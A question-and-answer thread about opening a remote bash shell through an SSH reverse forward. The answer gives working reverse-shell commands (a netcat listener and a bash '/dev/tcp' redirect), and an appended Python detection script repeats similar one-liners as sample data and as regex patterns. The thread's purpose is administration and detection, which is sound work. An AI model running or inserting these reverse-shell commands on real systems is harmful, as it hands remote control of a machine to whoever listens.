I have a machine without SSHD and I want to open a bash shell on this machine from a remote machine (that I can fully control).

Since I have SSH on my limited machine, I configured a reverse proxy:

$ ssh -R 19999:localhost:22 remoteuser@remotemachine

Now I have a connection on port 19999 from my "fully control" machine to my "limited" machine. How would I open a shell with this setup?


1 Answer

You can pipe the input from some port directly to the bash. This is common practice when misusing various bugs in software. For example, run on your full-access machine:

nc -lvp 9999

And on the limited machine:

/bin/bash -i >& /dev/tcp/192.168.122.1/9999 0>&1

Where the 192.168.122.1 is the IP of the full-control machine.

This will give you a shell of the second machine in the first one. But note that the connection is not encrypted. If you want encryption, you would need to add the TCP forwarding step (similar to what you propose above).

  • That works nicely! Is there a way to tunnel this connection through an SSH connection made from the limited machine to the full-control machine? Or could some other kind of encryption be used? – Lars Schneider Aug 11 '16 at 13:16
  • Second that, could you give an example on how to combine this with ssh tunneling or whatever it is you need to get an encrypted line? – Fractalf May 07 '20 at 16:35
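From a monitoring point of view, the three commands in this thread (a remote port forward with `ssh -R`, a listening netcat, and a bash `/dev/tcp` redirection) are exactly the shapes a host-based detection rule looks for in shell history or auditd `execve` records. The script below is an added example, not part of the original question or answer: it scans a list of command lines and reports each match with the rule that fired and the extracted host/port or forward spec. The input lines are constructed for the example; the rule names and the `Finding` type are my own.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample command lines, as they might appear in ~/.bash_history
# or the "proctitle"/"a0.." fields of an auditd execve record. Not real logs.
SAMPLE_LINES = [
    "ssh -R 19999:localhost:22 remoteuser@remotemachine",
    "nc -lvp 9999",
    "/bin/bash -i >& /dev/tcp/192.168.122.1/9999 0>&1",
    "ls -la /var/log",
    "bash -c 'exec 5<>/dev/tcp/10.0.0.5/4444; cat <&5 | sh >&5'",
    "curl https://example.invalid/update.sh",
]

# bash-only pseudo-device: /dev/tcp/HOST/PORT or /dev/udp/HOST/PORT
DEV_TCP = re.compile(r"/dev/(?P<proto>tcp|udp)/(?P<host>[^/\s]+)/(?P<port>\d{1,5})")
# nc / ncat / netcat invoked with a short-option cluster containing 'l' (listen)
NC_LISTEN = re.compile(r"(?:^|[\s;&|])(?:nc|ncat|netcat)\s+(?:-\S*\s+)*-[A-Za-z]*l")
# ssh with a remote forward (-R); legitimate admin tool, so informational only
SSH_REMOTE_FWD = re.compile(r"(?:^|[\s;&|])ssh\s+.*-R\s*(?P<spec>\S+)")


@dataclass
class Finding:
    rule: str      # which pattern matched
    line_no: int   # 1-based index into the scanned input
    detail: str    # extracted endpoint or forward spec
    text: str      # the offending command line


def scan_line(line_no: int, text: str) -> list[Finding]:
    """Apply all rules to one command line; a line may yield several findings."""
    findings: list[Finding] = []
    m = DEV_TCP.search(text)
    if m:
        findings.append(Finding("devtcp_redirect", line_no,
                                f"{m['proto']} {m['host']}:{m['port']}", text))
    if NC_LISTEN.search(text):
        findings.append(Finding("nc_listener", line_no, "listening netcat", text))
    m = SSH_REMOTE_FWD.search(text)
    if m:
        findings.append(Finding("ssh_remote_forward", line_no,
                                f"-R {m['spec']}", text))
    return findings


def scan(lines: list[str]) -> list[Finding]:
    """Scan every line, preserving input order."""
    out: list[Finding] = []
    for i, text in enumerate(lines, start=1):
        out.extend(scan_line(i, text))
    return out


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per rule, e.g. for an alert threshold."""
    return dict(Counter(f.rule for f in findings))


if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"line {f.line_no:>2}  {f.rule:<18} {f.detail:<28} {f.text}")
    print(summarize(scan(SAMPLE_LINES)))
```

The `devtcp_redirect` rule is the strongest signal: outside of deliberate scripting there is little reason for an interactive shell to redirect its file descriptors to `/dev/tcp/`, whereas `ssh -R` and a listening `nc` are ordinary administrative commands and are better treated as context for the first rule than as alerts on their own.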